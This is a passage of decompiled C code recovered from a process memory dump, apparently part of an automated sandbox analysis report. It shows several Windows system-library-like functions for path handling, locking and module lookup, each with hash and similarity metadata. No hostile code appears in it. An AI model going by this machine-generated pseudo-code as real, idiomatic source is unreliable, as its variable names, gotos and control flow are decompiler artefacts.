                                                														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                														if(_v540 == 5) {
                                                															_t182 = E015E52A5(1);
                                                															_v588 = _t182;
                                                															if(_t182 == 0) {
                                                																E015FEB70(1, 0x16d79a0);
                                                																goto L38;
                                                															} else {
                                                																_v560 = _t182 + 0xc;
                                                																_t185 = E015FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                																if(_t185 == 0) {
                                                																	_t324 = _v588;
                                                																	goto L97;
                                                																} else {
                                                																	_t306 = _v544;
                                                																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                																	 *(_t306 + 4) = _t282;
                                                																	_v576 = _t282;
                                                																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                																	 *_t306 = _t325;
                                                																	if( *_t282 == 0x5c) {
                                                																		_t149 = _t325 - 2; // -2
                                                																		_t283 = _t149;
                                                																		 *_t306 = _t283;
                                                																		 *(_t306 + 4) = _v576 + 2;
                                                																		_t185 = _t283 & 0x0000ffff;
                                                																	}
                                                																	_t324 = _v588;
                                                																	 *(_t306 + 2) = _t185;
                                                																	if((_v548 & 0x00000002) == 0) {
                                                																		L97:
                                                																		asm("lock xadd [esi], eax");
                                                																		if((_t185 | 0xffffffff) == 0) {
                                                																			_push( *((intOrPtr*)(_t324 + 4)));
                                                																			E016295D0();
                                                																			L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                																		}
                                                																	} else {
                                                																		 *(_t306 + 0xc) = _t324;
                                                																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                																	}
                                                																	goto L38;
                                                																}
                                                															}
                                                															goto L41;
                                                														}
                                                													}
                                                													L38:
                                                													_t322 = 0;
                                                												}
                                                											}
                                                										}
                                                									}
                                                									L39:
                                                									if(_t254 !=  &_v532) {
                                                										L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                									}
                                                									_t169 = _t322;
                                                								}
                                                								goto L41;
                                                							}
                                                							goto L68;
                                                						}
                                                					}
                                                					L41:
                                                					_pop(_t317);
                                                					_pop(_t323);
                                                					_pop(_t255);
                                                					return E0162B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                				} else {
                                                					_t299 = __edx[2];
                                                					if( *_t299 == 0x5c) {
                                                						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                						if(_t256 != 0x5c) {
                                                							if(_t256 != 0x3f) {
                                                								goto L2;
                                                							} else {
                                                								goto L50;
                                                							}
                                                						} else {
                                                							L50:
                                                							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                								goto L2;
                                                							} else {
                                                								_t251 = E01623D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                								_pop(_t319);
                                                								_pop(_t326);
                                                								_pop(_t257);
                                                								return E0162B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                							}
                                                						}
                                                					} else {
                                                						L2:
                                                						_t260 = _v572;
                                                						goto L3;
                                                					}
                                                				}
                                                				L101:
                                                			}


                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: da186fe7d26493758ea9669cd964a397d63d58a8289c098ad8ca238185645163
                                                • Instruction ID: aa33b2262056906faa7432c22299e3e4468182d70e645aea6552e5052e7cfb72
                                                • Opcode Fuzzy Hash: da186fe7d26493758ea9669cd964a397d63d58a8289c098ad8ca238185645163
                                                • Instruction Fuzzy Hash: 9FF15C706082118BD72ACF59C880A7BB7E1FF98714F05892EF685CB391EB35D895CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E016120A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed char _v24;
                                                				intOrPtr _v28;
                                                				signed int _v32;
                                                				void* _v36;
                                                				char _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				unsigned int _v60;
                                                				char _v64;
                                                				unsigned int _v68;
                                                				signed int _v72;
                                                				char _v73;
                                                				signed int _v74;
                                                				char _v75;
                                                				signed int _v76;
                                                				void* _v81;
                                                				void* _v82;
                                                				void* _v89;
                                                				void* _v92;
                                                				void* _v97;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed char _t128;
                                                				void* _t129;
                                                				signed int _t130;
                                                				void* _t132;
                                                				signed char _t133;
                                                				intOrPtr _t135;
                                                				signed int _t137;
                                                				signed int _t140;
                                                				signed int* _t144;
                                                				signed int* _t145;
                                                				intOrPtr _t146;
                                                				signed int _t147;
                                                				signed char* _t148;
                                                				signed int _t149;
                                                				signed int _t153;
                                                				signed int _t169;
                                                				signed int _t174;
                                                				signed int _t180;
                                                				void* _t197;
                                                				void* _t198;
                                                				signed int _t201;
                                                				intOrPtr* _t202;
                                                				intOrPtr* _t205;
                                                				signed int _t210;
                                                				signed int _t215;
                                                				signed int _t218;
                                                				signed char _t221;
                                                				signed int _t226;
                                                				char _t227;
                                                				signed int _t228;
                                                				void* _t229;
                                                				unsigned int _t231;
                                                				void* _t235;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				void* _t242;
                                                				signed int _t246;
                                                				signed int _t248;
                                                				signed int _t252;
                                                				signed int _t253;
                                                				void* _t254;
                                                				intOrPtr* _t256;
                                                				intOrPtr _t257;
                                                				unsigned int _t262;
                                                				signed int _t265;
                                                				void* _t267;
                                                				signed int _t275;
                                                
                                                				_t198 = __ebx;
                                                				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                				_v68 = __ecx;
                                                				_v73 = 0;
                                                				_t201 = __edx & 0x00002000;
                                                				_t128 = __edx & 0xffffdfff;
                                                				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                				_v72 = _t128;
                                                				if((_t128 & 0x00000008) != 0) {
                                                					__eflags = _t128 - 8;
                                                					if(_t128 != 8) {
                                                						L69:
                                                						_t129 = 0xc000000d;
                                                						goto L23;
                                                					} else {
                                                						_t130 = 0;
                                                						_v72 = 0;
                                                						_v75 = 1;
                                                						L2:
                                                						_v74 = 1;
                                                						_t226 =  *0x16d8714; // 0x0
                                                						if(_t226 != 0) {
                                                							__eflags = _t201;
                                                							if(_t201 != 0) {
                                                								L62:
                                                								_v74 = 1;
                                                								L63:
                                                								_t130 = _t226 & 0xffffdfff;
                                                								_v72 = _t130;
                                                								goto L3;
                                                							}
                                                							_v74 = _t201;
                                                							__eflags = _t226 & 0x00002000;
                                                							if((_t226 & 0x00002000) == 0) {
                                                								goto L63;
                                                							}
                                                							goto L62;
                                                						}
                                                						L3:
                                                						_t227 = _v75;
                                                						L4:
                                                						_t240 = 0;
                                                						_v56 = 0;
                                                						_t252 = _t130 & 0x00000100;
                                                						if(_t252 != 0 || _t227 != 0) {
                                                							_t240 = _v68;
                                                							_t132 = E01612EB0(_t240);
                                                							__eflags = _t132 - 2;
                                                							if(_t132 != 2) {
                                                								__eflags = _t132 - 1;
                                                								if(_t132 == 1) {
                                                									goto L25;
                                                								}
                                                								__eflags = _t132 - 6;
                                                								if(_t132 == 6) {
                                                									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                										goto L40;
                                                									}
                                                									_t197 = E01612EB0(_t240 + 8);
                                                									__eflags = _t197 - 2;
                                                									if(_t197 == 2) {
                                                										goto L25;
                                                									}
                                                								}
                                                								L40:
                                                								_t133 = 1;
                                                								L26:
                                                								_t228 = _v75;
                                                								_v56 = _t240;
                                                								__eflags = _t133;
                                                								if(_t133 != 0) {
                                                									__eflags = _t228;
                                                									if(_t228 == 0) {
                                                										L43:
                                                										__eflags = _v72;
                                                										if(_v72 == 0) {
                                                											goto L8;
                                                										}
                                                										goto L69;
                                                									}
                                                									_t133 = E015E58EC(_t240);
                                                									_t221 =  *0x16d5cac; // 0x16
                                                									__eflags = _t221 & 0x00000040;
                                                									if((_t221 & 0x00000040) != 0) {
                                                										_t228 = 0;
                                                										__eflags = _t252;
                                                										if(_t252 != 0) {
                                                											goto L43;
                                                										}
                                                										_t133 = _v72;
                                                										goto L7;
                                                									}
                                                									goto L43;
                                                								} else {
                                                									_t133 = _v72;
                                                									goto L6;
                                                								}
                                                							}
                                                							L25:
                                                							_t133 = _v73;
                                                							goto L26;
                                                						} else {
                                                							L6:
                                                							_t221 =  *0x16d5cac; // 0x16
                                                							L7:
                                                							if(_t133 != 0) {
                                                								__eflags = _t133 & 0x00001000;
                                                								if((_t133 & 0x00001000) != 0) {
                                                									_t133 = _t133 | 0x00000a00;
                                                									__eflags = _t221 & 0x00000004;
                                                									if((_t221 & 0x00000004) != 0) {
                                                										_t133 = _t133 | 0x00000400;
                                                									}
                                                								}
                                                								__eflags = _t228;
                                                								if(_t228 != 0) {
                                                									_t133 = _t133 | 0x00000100;
                                                								}
                                                								_t229 = E01624A2C(0x16d6e40, 0x1624b30, _t133, _t240);
                                                								__eflags = _t229;
                                                								if(_t229 == 0) {
                                                									_t202 = _a20;
                                                									goto L100;
                                                								} else {
                                                									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                									L15:
                                                									_t202 = _a20;
                                                									 *_t202 = _t135;
                                                									if(_t229 == 0) {
                                                										L100:
                                                										 *_a4 = 0;
                                                										_t137 = _a8;
                                                										__eflags = _t137;
                                                										if(_t137 != 0) {
                                                											 *_t137 = 0;
                                                										}
                                                										 *_t202 = 0;
                                                										_t129 = 0xc0000017;
                                                										goto L23;
                                                									} else {
                                                										_t242 = _a16;
                                                										if(_t242 != 0) {
                                                											_t254 = _t229;
                                                											memcpy(_t242, _t254, 0xd << 2);
                                                											_t267 = _t267 + 0xc;
                                                											_t242 = _t254 + 0x1a;
                                                										}
                                                										_t205 = _a4;
                                                										_t25 = _t229 + 0x48; // 0x48
                                                										 *_t205 = _t25;
                                                										_t140 = _a8;
                                                										if(_t140 != 0) {
                                                											__eflags =  *((char*)(_t267 + 0xa));
                                                											if( *((char*)(_t267 + 0xa)) != 0) {
                                                												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                											} else {
                                                												 *_t140 = 0;
                                                											}
                                                										}
                                                										_t256 = _a12;
                                                										if(_t256 != 0) {
                                                											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                										}
                                                										_t257 =  *_t205;
                                                										_v48 = 0;
                                                										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                										_v56 = 0;
                                                										_v52 = 0;
                                                										_t144 =  *( *[fs:0x30] + 0x50);
                                                										if(_t144 != 0) {
                                                											__eflags =  *_t144;
                                                											if( *_t144 == 0) {
                                                												goto L20;
                                                											}
                                                											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                											goto L21;
                                                										} else {
                                                											L20:
                                                											_t145 = 0x7ffe0384;
                                                											L21:
                                                											if( *_t145 != 0) {
                                                												_t146 =  *[fs:0x30];
                                                												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                													_t147 = E01607D50();
                                                													__eflags = _t147;
                                                													if(_t147 == 0) {
                                                														_t148 = 0x7ffe0385;
                                                													} else {
                                                														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                													}
                                                													__eflags =  *_t148 & 0x00000020;
                                                													if(( *_t148 & 0x00000020) != 0) {
                                                														_t149 = _v72;
                                                														__eflags = _t149;
                                                														if(__eflags == 0) {
                                                															_t149 = 0x15c5c80;
                                                														}
                                                														_push(_t149);
                                                														_push( &_v48);
                                                														 *((char*)(_t267 + 0xb)) = E0161F6E0(_t198, _t242, _t257, __eflags);
                                                														_push(_t257);
                                                														_push( &_v64);
                                                														_t153 = E0161F6E0(_t198, _t242, _t257, __eflags);
                                                														__eflags =  *((char*)(_t267 + 0xb));
                                                														if( *((char*)(_t267 + 0xb)) != 0) {
                                                															__eflags = _t153;
                                                															if(_t153 != 0) {
                                                																__eflags = 0;
                                                																E01667016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                																L01602400(_t267 + 0x20);
                                                															}
                                                															L01602400( &_v64);
                                                														}
                                                													}
                                                												}
                                                											}
                                                											_t129 = 0;
                                                											L23:
                                                											return _t129;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							L8:
                                                							_t275 = _t240;
                                                							if(_t275 != 0) {
                                                								_v73 = 0;
                                                								_t253 = 0;
                                                								__eflags = 0;
                                                								L29:
                                                								_push(0);
                                                								_t241 = E01612397(_t240);
                                                								__eflags = _t241;
                                                								if(_t241 == 0) {
                                                									_t229 = 0;
                                                									L14:
                                                									_t135 = 0;
                                                									goto L15;
                                                								}
                                                								__eflags =  *((char*)(_t267 + 0xb));
                                                								 *(_t241 + 0x34) = 1;
                                                								if( *((char*)(_t267 + 0xb)) != 0) {
                                                									E01602280(_t134, 0x16d8608);
                                                									__eflags =  *0x16d6e48 - _t253; // 0x0
                                                									if(__eflags != 0) {
                                                										L48:
                                                										_t253 = 0;
                                                										__eflags = 0;
                                                										L49:
                                                										E015FFFB0(_t198, _t241, 0x16d8608);
                                                										__eflags = _t253;
                                                										if(_t253 != 0) {
                                                											L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                										}
                                                										goto L31;
                                                									}
                                                									 *0x16d6e48 = _t241;
                                                									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                									__eflags = _t253;
                                                									if(_t253 != 0) {
                                                										_t57 = _t253 + 0x34;
                                                										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                										__eflags =  *_t57;
                                                										if( *_t57 == 0) {
                                                											goto L49;
                                                										}
                                                									}
                                                									goto L48;
                                                								}
                                                								L31:
                                                								_t229 = _t241;
                                                								goto L14;
                                                							}
                                                							_v73 = 1;
                                                							_v64 = _t240;
                                                							asm("lock bts dword [esi], 0x0");
                                                							if(_t275 < 0) {
                                                								_t231 =  *0x16d8608; // 0x0
                                                								while(1) {
                                                									_v60 = _t231;
                                                									__eflags = _t231 & 0x00000001;
                                                									if((_t231 & 0x00000001) != 0) {
                                                										goto L76;
                                                									}
                                                									_t73 = _t231 + 1; // 0x1
                                                									_t210 = _t73;
                                                									asm("lock cmpxchg [edi], ecx");
                                                									__eflags = _t231 - _t231;
                                                									if(_t231 != _t231) {
                                                										L92:
                                                										_t133 = E01616B90(_t210,  &_v64);
                                                										_t262 =  *0x16d8608; // 0x0
                                                										L93:
                                                										_t231 = _t262;
                                                										continue;
                                                									}
                                                									_t240 = _v56;
                                                									goto L10;
                                                									L76:
                                                									_t169 = E0161E180(_t133);
                                                									__eflags = _t169;
                                                									if(_t169 != 0) {
                                                										_push(0xc000004b);
                                                										_push(0xffffffff);
                                                										E016297C0();
                                                										_t231 = _v68;
                                                									}
                                                									_v72 = 0;
                                                									_v24 =  *( *[fs:0x18] + 0x24);
                                                									_v16 = 3;
                                                									_v28 = 0;
                                                									__eflags = _t231 & 0x00000002;
                                                									if((_t231 & 0x00000002) == 0) {
                                                										_v32 =  &_v36;
                                                										_t174 = _t231 >> 4;
                                                										__eflags = 1 - _t174;
                                                										_v20 = _t174;
                                                										asm("sbb ecx, ecx");
                                                										_t210 = 3 |  &_v36;
                                                										__eflags = _t174;
                                                										if(_t174 == 0) {
                                                											_v20 = 0xfffffffe;
                                                										}
                                                									} else {
                                                										_v32 = 0;
                                                										_v20 = 0xffffffff;
                                                										_v36 = _t231 & 0xfffffff0;
                                                										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                                                										_v72 =  !(_t231 >> 2) & 0xffffff01;
                                                									}
                                                									asm("lock cmpxchg [edi], esi");
                                                									_t262 = _t231;
                                                									__eflags = _t262 - _t231;
                                                									if(_t262 != _t231) {
                                                										goto L92;
                                                									} else {
                                                										__eflags = _v72;
                                                										if(_v72 != 0) {
                                                											E0162006A(0x16d8608, _t210);
                                                										}
                                                										__eflags =  *0x7ffe036a - 1;
                                                										if(__eflags <= 0) {
                                                											L89:
                                                											_t133 =  &_v16;
                                                											asm("lock btr dword [eax], 0x1");
                                                											if(__eflags >= 0) {
                                                												goto L93;
                                                											} else {
                                                												goto L90;
                                                											}
                                                											do {
                                                												L90:
                                                												_push(0);
                                                												_push(0x16d8608);
                                                												E0162B180();
                                                												_t133 = _v24;
                                                												__eflags = _t133 & 0x00000004;
                                                											} while ((_t133 & 0x00000004) == 0);
                                                											goto L93;
                                                										} else {
                                                											_t218 =  *0x16d6904; // 0x400
                                                											__eflags = _t218;
                                                											if(__eflags == 0) {
                                                												goto L89;
                                                											} else {
                                                												goto L87;
                                                											}
                                                											while(1) {
                                                												L87:
                                                												__eflags = _v16 & 0x00000002;
                                                												if(__eflags == 0) {
                                                													goto L89;
                                                												}
                                                												asm("pause");
                                                												_t218 = _t218 - 1;
                                                												__eflags = _t218;
                                                												if(__eflags != 0) {
                                                													continue;
                                                												}
                                                												goto L89;
                                                											}
                                                											goto L89;
                                                										}
                                                									}
                                                								}
                                                							}
                                                							L10:
                                                							_t229 =  *0x16d6e48; // 0x0
                                                							_v72 = _t229;
                                                							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                								E015FFFB0(_t198, _t240, 0x16d8608);
                                                								_t253 = _v76;
                                                								goto L29;
                                                							} else {
                                                								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                                                								asm("lock cmpxchg [esi], ecx");
                                                								_t215 = 1;
                                                								if(1 != 1) {
                                                									while(1) {
                                                										_t246 = _t215 & 0x00000006;
                                                										_t180 = _t215;
                                                										__eflags = _t246 - 2;
                                                										_v56 = _t246;
                                                										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                                                										asm("lock cmpxchg [edi], esi");
                                                										_t248 = _v56;
                                                										__eflags = _t180 - _t215;
                                                										if(_t180 == _t215) {
                                                											break;
                                                										}
                                                										_t215 = _t180;
                                                									}
                                                									__eflags = _t248 - 2;
                                                									if(_t248 == 2) {
                                                										__eflags = 0;
                                                										E016200C2(0x16d8608, 0, _t235);
                                                									}
                                                									_t229 = _v72;
                                                								}
                                                								goto L14;
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_t227 = 0;
                                                				_v75 = 0;
                                                				if(_t128 != 0) {
                                                					goto L4;
                                                				}
                                                				goto L2;
                                                			}

                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5fbea8d0776c03daee08b98e2856c1d0f6369cef5f68104fe50cd92fdd83c63b
                                                • Instruction ID: add6eb203995c000677b96c4dfa6c0dbed2febd50eb0638b1a59f7806f0282d9
                                                • Opcode Fuzzy Hash: 5fbea8d0776c03daee08b98e2856c1d0f6369cef5f68104fe50cd92fdd83c63b
                                                • Instruction Fuzzy Hash: F3F10431A083419FE726CF2DCC5476B7BE6AF85324F28851DEA968B385D734D841CB82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 87%
                                                			E015FD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                                                				signed int _v8;
                                                				intOrPtr _v20;
                                                				signed int _v36;
                                                				intOrPtr* _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed char _v52;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v68;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				intOrPtr _v80;
                                                				signed int _v84;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				signed int _v108;
                                                				signed int _v112;
                                                				signed int _v116;
                                                				intOrPtr _v120;
                                                				signed int _v132;
                                                				char _v140;
                                                				char _v144;
                                                				char _v157;
                                                				signed int _v164;
                                                				signed int _v168;
                                                				signed int _v169;
                                                				intOrPtr _v176;
                                                				signed int _v180;
                                                				signed int _v184;
                                                				intOrPtr _v188;
                                                				signed int _v192;
                                                				signed int _v200;
                                                				signed int _v208;
                                                				intOrPtr* _v212;
                                                				char _v216;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t204;
                                                				void* _t208;
                                                				signed int _t211;
                                                				signed int _t216;
                                                				intOrPtr _t217;
                                                				intOrPtr* _t218;
                                                				signed int _t226;
                                                				signed int _t239;
                                                				signed int* _t247;
                                                				signed int _t249;
                                                				void* _t252;
                                                				signed int _t256;
                                                				signed int _t269;
                                                				signed int _t271;
                                                				signed int _t277;
                                                				signed int _t279;
                                                				intOrPtr _t283;
                                                				signed int _t287;
                                                				signed int _t288;
                                                				void* _t289;
                                                				signed char _t290;
                                                				signed int _t292;
                                                				signed int* _t293;
                                                				signed int _t306;
                                                				signed int _t307;
                                                				signed int _t308;
                                                				signed int _t309;
                                                				signed int _t310;
                                                				intOrPtr _t311;
                                                				intOrPtr _t312;
                                                				signed int _t319;
                                                				signed int _t320;
                                                				signed int* _t324;
                                                				signed int _t337;
                                                				signed int _t338;
                                                				signed int _t339;
                                                				signed int* _t340;
                                                				void* _t341;
                                                				signed int _t344;
                                                				signed int _t348;
                                                				signed int _t349;
                                                				signed int _t351;
                                                				intOrPtr _t353;
                                                				void* _t354;
                                                				signed int _t356;
                                                				signed int _t358;
                                                				intOrPtr _t359;
                                                				signed int _t363;
                                                				signed short* _t365;
                                                				void* _t367;
                                                				intOrPtr _t369;
                                                				void* _t370;
                                                				signed int _t371;
                                                				signed int _t372;
                                                				void* _t374;
                                                				signed int _t376;
                                                				void* _t384;
                                                				signed int _t387;
                                                
                                                				_v8 =  *0x16dd360 ^ _t376;
                                                				_t2 =  &_a20;
                                                				 *_t2 = _a20 & 0x00000001;
                                                				_t287 = _a4;
                                                				_v200 = _a12;
                                                				_t365 = _a8;
                                                				_v212 = _a16;
                                                				_v180 = _a24;
                                                				_v168 = 0;
                                                				_v157 = 0;
                                                				if( *_t2 != 0) {
                                                					__eflags = E015F6600(0x16d52d8);
                                                					if(__eflags == 0) {
                                                						goto L1;
                                                					} else {
                                                						_v188 = 6;
                                                					}
                                                				} else {
                                                					L1:
                                                					_v188 = 9;
                                                				}
                                                				if(_t365 == 0) {
                                                					_v164 = 0;
                                                					goto L5;
                                                				} else {
                                                					_t363 =  *_t365 & 0x0000ffff;
                                                					_t341 = _t363 + 1;
                                                					if((_t365[1] & 0x0000ffff) < _t341) {
                                                						L109:
                                                						__eflags = _t341 - 0x80;
                                                						if(_t341 <= 0x80) {
                                                							_t281 =  &_v140;
                                                							_v164 =  &_v140;
                                                							goto L114;
                                                						} else {
                                                							_t283 =  *0x16d7b9c; // 0x0
                                                							_t281 = L01604620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                                                							_v164 = _t281;
                                                							__eflags = _t281;
                                                							if(_t281 != 0) {
                                                								_v157 = 1;
                                                								L114:
                                                								E0162F3E0(_t281, _t365[2], _t363);
                                                								_t200 = _v164;
                                                								 *((char*)(_v164 + _t363)) = 0;
                                                								goto L5;
                                                							} else {
                                                								_t204 = 0xc000009a;
                                                								goto L47;
                                                							}
                                                						}
                                                					} else {
                                                						_t200 = _t365[2];
                                                						_v164 = _t200;
                                                						if( *((char*)(_t200 + _t363)) != 0) {
                                                							goto L109;
                                                						} else {
                                                							while(1) {
                                                								L5:
                                                								_t353 = 0;
                                                								_t342 = 0x1000;
                                                								_v176 = 0;
                                                								if(_t287 == 0) {
                                                									break;
                                                								}
                                                								_t384 = _t287 -  *0x16d7b90; // 0x775e0000
                                                								if(_t384 == 0) {
                                                									_t353 =  *0x16d7b8c; // 0x1182a88
                                                									_v176 = _t353;
                                                									_t320 = ( *(_t353 + 0x50))[8];
                                                									_v184 = _t320;
                                                								} else {
                                                									E01602280(_t200, 0x16d84d8);
                                                									_t277 =  *0x16d85f4; // 0x1182f78
                                                									_t351 =  *0x16d85f8 & 1;
                                                									while(_t277 != 0) {
                                                										_t337 =  *(_t277 - 0x50);
                                                										if(_t337 > _t287) {
                                                											_t338 = _t337 | 0xffffffff;
                                                										} else {
                                                											asm("sbb ecx, ecx");
                                                											_t338 =  ~_t337;
                                                										}
                                                										_t387 = _t338;
                                                										if(_t387 < 0) {
                                                											_t339 =  *_t277;
                                                											__eflags = _t351;
                                                											if(_t351 != 0) {
                                                												__eflags = _t339;
                                                												if(_t339 == 0) {
                                                													goto L16;
                                                												} else {
                                                													goto L118;
                                                												}
                                                												goto L151;
                                                											} else {
                                                												goto L16;
                                                											}
                                                											goto L17;
                                                										} else {
                                                											if(_t387 <= 0) {
                                                												__eflags = _t277;
                                                												if(_t277 != 0) {
                                                													_t340 =  *(_t277 - 0x18);
                                                													_t24 = _t277 - 0x68; // 0x1182f10
                                                													_t353 = _t24;
                                                													_v176 = _t353;
                                                													__eflags = _t340[3] - 0xffffffff;
                                                													if(_t340[3] != 0xffffffff) {
                                                														_t279 =  *_t340;
                                                														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                															asm("lock inc dword [edi+0x9c]");
                                                															_t340 =  *(_t353 + 0x50);
                                                														}
                                                													}
                                                													_v184 = _t340[8];
                                                												}
                                                											} else {
                                                												_t339 =  *(_t277 + 4);
                                                												if(_t351 != 0) {
                                                													__eflags = _t339;
                                                													if(_t339 == 0) {
                                                														goto L16;
                                                													} else {
                                                														L118:
                                                														_t277 = _t277 ^ _t339;
                                                														goto L17;
                                                													}
                                                													goto L151;
                                                												} else {
                                                													L16:
                                                													_t277 = _t339;
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                										goto L25;
                                                										L17:
                                                									}
                                                									L25:
                                                									E015FFFB0(_t287, _t353, 0x16d84d8);
                                                									_t320 = _v184;
                                                									_t342 = 0x1000;
                                                								}
                                                								if(_t353 == 0) {
                                                									break;
                                                								} else {
                                                									_t366 = 0;
                                                									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                										_t288 = _v164;
                                                										if(_t353 != 0) {
                                                											_t342 = _t288;
                                                											_t374 = E0163CC99(_t353, _t288, _v200, 1,  &_v168);
                                                											if(_t374 >= 0) {
                                                												if(_v184 == 7) {
                                                													__eflags = _a20;
                                                													if(__eflags == 0) {
                                                														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                														if(__eflags != 0) {
                                                															_t271 = E015F6600(0x16d52d8);
                                                															__eflags = _t271;
                                                															if(__eflags == 0) {
                                                																_t342 = 0;
                                                																_v169 = _t271;
                                                																_t374 = E015F7926( *(_t353 + 0x50), 0,  &_v169);
                                                															}
                                                														}
                                                													}
                                                												}
                                                												if(_t374 < 0) {
                                                													_v168 = 0;
                                                												} else {
                                                													if( *0x16db239 != 0) {
                                                														_t342 =  *(_t353 + 0x18);
                                                														E0166E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                													}
                                                													if( *0x16d8472 != 0) {
                                                														_v192 = 0;
                                                														_t342 =  *0x7ffe0330;
                                                														asm("ror edi, cl");
                                                														 *0x16db1e0( &_v192, _t353, _v168, 0, _v180);
                                                														 *( *0x16db218 ^  *0x7ffe0330)();
                                                														_t269 = _v192;
                                                														_t353 = _v176;
                                                														__eflags = _t269;
                                                														if(__eflags != 0) {
                                                															_v168 = _t269;
                                                														}
                                                													}
                                                												}
                                                											}
                                                											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                												_t366 = 0xc000007a;
                                                											}
                                                											_t247 =  *(_t353 + 0x50);
                                                											if(_t247[3] == 0xffffffff) {
                                                												L40:
                                                												if(_t366 == 0xc000007a) {
                                                													__eflags = _t288;
                                                													if(_t288 == 0) {
                                                														goto L136;
                                                													} else {
                                                														_t366 = 0xc0000139;
                                                													}
                                                													goto L54;
                                                												}
                                                											} else {
                                                												_t249 =  *_t247;
                                                												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                													goto L40;
                                                												} else {
                                                													_t250 = _t249 | 0xffffffff;
                                                													asm("lock xadd [edi+0x9c], eax");
                                                													if((_t249 | 0xffffffff) == 0) {
                                                														E01602280(_t250, 0x16d84d8);
                                                														_t342 =  *(_t353 + 0x54);
                                                														_t165 = _t353 + 0x54; // 0x54
                                                														_t252 = _t165;
                                                														__eflags =  *(_t342 + 4) - _t252;
                                                														if( *(_t342 + 4) != _t252) {
                                                															L135:
                                                															asm("int 0x29");
                                                															L136:
                                                															_t288 = _v200;
                                                															_t366 = 0xc0000138;
                                                															L54:
                                                															_t342 = _t288;
                                                															L01623898(0, _t288, _t366);
                                                														} else {
                                                															_t324 =  *(_t252 + 4);
                                                															__eflags =  *_t324 - _t252;
                                                															if( *_t324 != _t252) {
                                                																goto L135;
                                                															} else {
                                                																 *_t324 = _t342;
                                                																 *(_t342 + 4) = _t324;
                                                																_t293 =  *(_t353 + 0x50);
                                                																_v180 =  *_t293;
                                                																E015FFFB0(_t293, _t353, 0x16d84d8);
                                                																__eflags =  *((short*)(_t353 + 0x3a));
